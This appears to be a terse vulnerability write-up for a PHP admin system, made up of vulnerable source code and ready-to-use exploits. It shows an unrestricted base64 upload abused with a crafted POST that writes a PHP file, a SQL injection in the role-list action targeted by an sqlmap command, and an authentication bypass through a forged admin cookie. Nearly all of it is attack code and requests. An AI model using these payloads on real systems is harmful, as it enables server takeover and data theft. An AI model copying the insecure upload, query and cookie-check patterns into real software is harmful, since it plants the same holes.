<?php  /** * Description: PhpStorm. * Author: yoby * DateTime: 2018/12/4 18:01 * Email:logove@qq.com * Copyright Yoby版权所有 */  $img = $_POST['imgbase64'];if (preg_match('/^(data:s*image/(w+);base64,)/', $img, $result)) {  $type = ".".$result[2];  $path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;}$img =  base64_decode(str_replace($result[1], '', $img));@file_put_contents($path, $img);exit('{"src":"'.$path.'"}');

POST /uploadbase64.php HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 68Content-Type: application/x-www-form-urlencodedHost: 127.0.0.1Origin: http://127.0.0.1Referer: http://127.0.0.1/uploadbase64.phpSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36sec-ch-ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-user: ?1
imgbase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==

<?php  include("../db.php");switch ($_GET['action']) {  case 'list':  $pindex = max(1, intval($_GET['page']));  $psize = $_GET['limit'];  $key=$_GET['sjuese'];  $sql="SELECT *  FROM ".$db->tablename('juese') ." WHERE id>0";  if($key!=''){    $sql=$sql." and juese like '%$key%'";  }  $sql=$sql."  ORDER BY id asc LIMIT ".($pindex - 1) * $psize.','.$psize;  $list =$db->fetchall($sql);  $total =count($list);  $arr = [    'msg' => '请求成功',    'code' => 0,    'data' => $list,    'count' => $total    ];  exit(json_encode($arr));  break;  case 'addsave':  $bianhao=$_POST['bianhao'];  $juese=$_POST['juese'];  $quanxian=$_POST['quanxian'];  $menuid=$_POST['menuid'];  $beizhu=$_POST['beizhu'];  $data=compact('bianhao','juese','quanxian','menuid','beizhu');//构造数组  $db->insert('juese',$data);//添加数据  $arr=['isOk'=>1,'message'=>'角色添加成功'];  exit(json_encode($arr));//返回  break;    case 'editsave':  $id=$_POST['id'];  $bianhao=$_POST['bianhao'];  $juese=$_POST['juese'];  $quanxian=$_POST['quanxian'];  $menuid=$_POST['menuid'];  $beizhu=$_POST['beizhu'];  $data=compact('bianhao','juese','quanxian','menuid','beizhu');//构造数组  $db->update('juese',$data,['id'=>$id]);//查询获取数组  $arr=  ['isOk'=>1,'message'=>'角色修改成功'];  exit(json_encode($arr));  break;  case 'delall':  $id = $_POST['ids'];  $ids=explode(',',$id);//拆分为数组  if($id==''){    $arr=['isOk'=>0,'message'=>'删除记录不能为空'];    exit(json_encode($arr));  }  // $data = compact('id');//构造数组等同array("id"=>2)  $db->delete('juese',['id'=>$ids]);  $arr=  ['isOk'=>1,'message'=>'删除成功'];  exit(json_encode($arr));  break;  }?>

sqlmap.py -u "http://127.0.0.1/system/juese.php?action=list&page=1&limit=15&sjuese=*"

<?phpfunction islogin(){   if(isset($_COOKIE['id'])&&isset($_COOKIE['loginname'])&&isset($_COOKIE['jueseid'])&&isset($_COOKIE['danweiid'])&&isset($_COOKIE['quanxian'])){     if($_COOKIE['id']!=''&&$_COOKIE['loginname']!=''&&$_COOKIE['jueseid']!=''&&$_COOKIE['danweiid']!=''&&$_COOKIE['quanxian']!=''){         return true;     }      else {        return false;     }    }    else {      return false;     }}?>

Cookie:loginname=admin; jueseid=1; danweiid=1; quanxian=0; id=1